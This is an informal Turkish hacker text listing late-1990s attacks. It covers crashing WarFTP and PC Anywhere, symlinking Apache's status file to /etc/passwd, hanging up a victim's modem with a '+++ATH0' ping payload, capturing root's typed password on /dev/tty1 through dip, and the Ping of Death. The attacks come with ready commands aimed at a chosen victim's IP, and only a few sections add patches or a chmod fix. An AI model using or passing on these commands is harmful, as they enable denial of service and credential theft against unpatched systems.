| |
Sistem : Win 95/98/NT
Program : WarFTP Daemon
Ilk olarak ftp-liyorsunuz(21).
Sonra username kismina,
User : abelühübülüzappuruzuppurusizigidilamerlarhobadükvayanasina (yada bunun kadar uzun ve aptal bir username :) )
giriyorsunuz,ve password kismina da,
Password : abelühübülüzappuruzuppurusizigidilamerlarhobadükvayanasina (yada bunun kadar uzun ve aptal bir password :) )
giriyorsunuz.
Ve sistemi assagi davet etmis oluyoruz.
Tabii patch ide bulunuyor.(heheh)
+-+-+-+-+-+-+-+
Sistem : Linux
Program : Apache 1.1.3
Apache bayagi iyi,ve ünlü bir http daeomon’i,ama tabiiki,bug’i yok degil :)
Apache,çalistirildiginda,"/tmp/apache_status" gibi bir dosya yaratiyor.Ve bu dosya aptal gibi her link i izliyor.Bu dosyayi,mesela "/etc/passwd" e assagida görüldügü gibi static linkleyebiliriz.
$ ln -s /etc/passwd /tmp/apache_status
+-+-+-+-+-+-+-+
Ping in modem üzerinde yetkisi
Bug,modem ile ilgili,"+ + +ATH0" komutu,modem e hangup sinyalini yollar.Siz Windows ta,internet ten çikmak için "Disconnect" e tikladiginizda,aslinda modem e "+ + +ATH0" sinyalini yollamis, olursunuz.
Öncelikle kendimize bir kurban bulalim,sonra hemen komutumuzu yazalim :)
$ ping -p 2b2b2b415448300d 000.000.000.000
Tamam ,anladim,hiç birsey anlasilmiyor komutdan,ama simdi açiklayacagim :))
Karsi tarafa ping yolluyoruz.Ama bu garip bir paket boyutu,"2b2b2b415448300d". Söyle diyim,"2b2b2b" ,"+ + +ATH0" in,HEX kod’u."000.000.000.000" yerine de kurbanin IP sini yazicaksiniz.
Ayrica , bu yolu kullanarak,kurbanin baska yerlere telefon etmesi gibi bir çok seyi yaptirabilirsiniz.
+-+-+-+-+-+-+-+
Sistem : Linux
Komut : /usr/sbin/dip
"dip",Linux ta bulunan bir Dial-up programi.George Staikos un "dip" te buldugu bug sayesinde herhangi bir kullanici "/dev" dizininde yetki sahibi olabiliyor.
Örnek :
$ whoami
kaiowas
$ cat < /dev/tty1 <------ root un loginledigi yer
bash: /dev/tty1: Permission denied <------ bunu asabiliriz
$ dip -t
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP> port tty1
DIP> echo on
DIP> term
[ Entering TERMINAL mode. Use CTRL-] to get back ]
rootun_sifresi <------ sansiniz varsa tabii :)
[ Back to LOCAL mode. ]
DIP> quit
$
Korunma :
chmod u-s /usr/sbin/dip
+-+-+-+-+-+-+-+
Program : PC Anywhere
Sistem : PC Anywhere 8.0 yüklü WinNT (Belki baskalarida..)
PC Anywhere,bilindigi gibi bir çok dergi tarafindan,dagitilmis bir "share" programi.. Cain Tasam,bu program üzerinde söyle bir bug bulmus.Eger PC Anywhere Server inin çalistigi bir sistemin 5631. portuna telnetlerseniz.PC Anywhere çöküyor.Bu,tamamen patchleri yüklü bir WinNT 4.0 sistemde bir kaç kisi tarafindan denendi.Deneyen kisilerin söyledigine göre sistem birinci telnet sezonunda çökmüyor.Ikinci ve üçüncü sezonlarda bu bug harekete geçiyor.
+-+-+-+-+-+-+-+
Komut : "Ping of Death"
Sistem : WinNT 3.51,4.0
Çok büyük paketteki pingler (PING -l 65527 -s 1 hostname) yada Underground tabiriyle "Ölümün Ping’i" ,WinNT 3.51 sistemlerde o meshur mavi ekran i ortaya çikartiyor...
Ayni seyi WinNT 4.0 da yiyor,fakat 3.51 kadar basit mavi ekran i ortaya çikarmiyor. Windows based isletim sistemlerinde bu hata çok görülüyor.Bu bir D.O.S atak sayilabilir. Denemek isteyenler için komut :
ping -l 65524 host.domain.com
Korunma : "Ölüm Ping’i" ni durdurmak o kadar zor degil.En son service packler yada updateler kullanilarak bu sorunu ortadan kaldirabilirsiniz.
Windows NT 4.0 için,
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/
Windows NT 3.51 için,
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt351/
Windows 95 için,
http://www.microsoft.com/windows/common/contentW95UGA.htm
|
